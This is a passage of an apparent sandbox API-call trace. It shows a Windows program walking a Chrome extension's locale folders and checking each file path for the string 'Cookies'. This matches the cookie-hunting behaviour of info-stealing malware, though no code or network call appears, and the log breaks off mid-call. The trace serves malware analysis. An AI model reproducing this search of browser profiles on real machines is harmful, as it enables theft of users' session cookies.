Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg") returned 137 [0163.393] lstrlenW (lpString="\\") returned 1 [0163.393] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json", lpSrch="Cookies") returned 0x0 [0163.393] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x108, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.393] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.393] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864c72b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="ca", cAlternateFileName="")) returned 1 [0163.393] lstrcmpiW (lpString1="ca", lpString2=".") returned 1 [0163.393] lstrcmpiW (lpString1="ca", lpString2="..") returned 1 [0163.393] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.393] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.393] lstrlenW (lpString="\\") returned 1 [0163.393] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.393] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864c72b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0163.393] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.394] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.394] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xcf, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.394] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca") returned 137 [0163.394] lstrlenW (lpString="\\") returned 1 [0163.394] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json", lpSrch="Cookies") returned 0x0 [0163.394] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xcf, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.394] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.394] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864c72b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="cs", cAlternateFileName="")) returned 1 [0163.394] lstrcmpiW (lpString1="cs", lpString2=".") returned 1 [0163.394] lstrcmpiW (lpString1="cs", lpString2="..") returned 1 [0163.394] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.394] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.394] lstrlenW (lpString="\\") returned 1 [0163.395] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.395] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864c72b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0163.395] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.395] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.395] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xde, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.395] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json", lpSrch="Cookies") returned 0x0 [0163.395] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xde, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.395] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.395] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864ed410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864ed410, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="da", cAlternateFileName="")) returned 1 [0163.395] lstrcmpiW (lpString1="da", lpString2=".") returned 1 [0163.395] lstrcmpiW (lpString1="da", lpString2="..") returned 1 [0163.395] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.395] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.395] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864ed410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864ed410, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0163.396] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.396] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.396] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864ebca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.396] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json", lpSrch="Cookies") returned 0x0 [0163.396] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864ebca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.396] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.396] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864ed410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864ed410, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="de", cAlternateFileName="")) returned 1 [0163.396] lstrcmpiW (lpString1="de", lpString2=".") returned 1 [0163.396] lstrcmpiW (lpString1="de", lpString2="..") returned 1 [0163.396] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.396] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.396] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864ed410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864ed410, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0163.396] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.396] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.396] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864ebca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd9, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.397] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json", lpSrch="Cookies") returned 0x0 [0163.397] lstrcmpiW (lpString1="el", lpString2=".") returned 1 [0163.397] lstrcmpiW (lpString1="el", lpString2="..") returned 1 [0163.397] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.397] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.397] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.397] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.397] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json", lpSrch="Cookies") returned 0x0 [0163.397] lstrcmpiW (lpString1="en_GB", lpString2=".") returned 1 [0163.397] lstrcmpiW (lpString1="en_GB", lpString2="..") returned 1 [0163.397] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.398] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.398] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.398] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.398] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json", lpSrch="Cookies") returned 0x0 [0163.398] lstrcmpiW (lpString1="en_US", lpString2=".") returned 1 [0163.398] lstrcmpiW (lpString1="en_US", lpString2="..") returned 1 [0163.398] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.398] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.398] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.398] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.398] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json", lpSrch="Cookies") returned 0x0 [0163.398] lstrcmpiW (lpString1="es", lpString2=".") returned 1 [0163.398] lstrcmpiW (lpString1="es", lpString2="..") returned 1 [0163.398] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.398] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.399] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.399] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.399] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json", lpSrch="Cookies") returned 0x0 [0163.399] lstrcmpiW (lpString1="es_419", lpString2=".") returned 1 [0163.399] lstrcmpiW (lpString1="es_419", lpString2="..") returned 1 [0163.399] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.399] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.399] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.399] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.399] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json", lpSrch="Cookies") returned 0x0 [0163.399] lstrcmpiW (lpString1="et", lpString2=".") returned 1 [0163.399] lstrcmpiW (lpString1="et", lpString2="..") returned 1 [0163.399] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.399] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.400] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.400] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.400] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json", lpSrch="Cookies") returned 0x0 [0163.400] lstrcmpiW (lpString1="fi", lpString2=".") returned 1 [0163.400] lstrcmpiW (lpString1="fi", lpString2="..") returned 1 [0163.400] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.400] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.400] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.400] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.400] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json", lpSrch="Cookies") returned 0x0 [0163.400] lstrcmpiW (lpString1="fil", lpString2=".") returned 1 [0163.400] lstrcmpiW (lpString1="fil", lpString2="..") returned 1 [0163.400] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.400] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.400] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.401] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.401] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json", lpSrch="Cookies") returned 0x0 [0163.401] lstrcmpiW (lpString1="fr", lpString2=".") returned 1 [0163.401] lstrcmpiW (lpString1="fr", lpString2="..") returned 1 [0163.401] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.401] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.401] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.401] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.401] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json", lpSrch="Cookies") returned 0x0 [0163.401] lstrcmpiW (lpString1="he", lpString2=".") returned 1 [0163.401] lstrcmpiW (lpString1="he", lpString2="..") returned 1 [0163.401] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.401] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.401] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.401] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.402] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json", lpSrch="Cookies") returned 0x0 [0163.402] lstrcmpiW (lpString1="hi", lpString2=".") returned 1 [0163.402] lstrcmpiW (lpString1="hi", lpString2="..") returned 1 [0163.402] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.402] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.402] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.402] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.402] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json", lpSrch="Cookies") returned 0x0 [0163.517] lstrcmpiW (lpString1="hu", lpString2=".") returned 1 [0163.517] lstrcmpiW (lpString1="hu", lpString2="..") returned 1 [0163.517] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.518] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.518] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.518] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.518] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json", lpSrch="Cookies") returned 0x0 [0163.518] lstrcmpiW (lpString1="id", lpString2=".") returned 1 [0163.518] lstrcmpiW (lpString1="id", lpString2="..") returned 1 [0163.518] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.518] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.518] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.518] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.518] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json", lpSrch="Cookies") returned 0x0 [0163.518] lstrcmpiW (lpString1="it", lpString2=".") returned 1 [0163.518] lstrcmpiW (lpString1="it", lpString2="..") returned 1 [0163.518] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.519] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.519] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.519] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.519] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json", lpSrch="Cookies") returned 0x0 [0163.519] lstrcmpiW (lpString1="ja", lpString2=".") returned 1 [0163.519] lstrcmpiW (lpString1="ja", lpString2="..") returned 1 [0163.519] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.519] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.519] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.519] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.519] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json", lpSrch="Cookies") returned 0x0 [0163.519] lstrcmpiW (lpString1="ko", lpString2=".") returned 1 [0163.519] lstrcmpiW (lpString1="ko", lpString2="..") returned 1 [0163.519] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.519] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.520] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.520] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.520] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json", lpSrch="Cookies") returned 0x0 [0163.520] lstrcmpiW (lpString1="lt", lpString2=".") returned 1 [0163.520] lstrcmpiW (lpString1="lt", lpString2="..") returned 1 [0163.520] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.520] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.520] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.520] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.520] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json", lpSrch="Cookies") returned 0x0 [0163.520] lstrcmpiW (lpString1="lv", 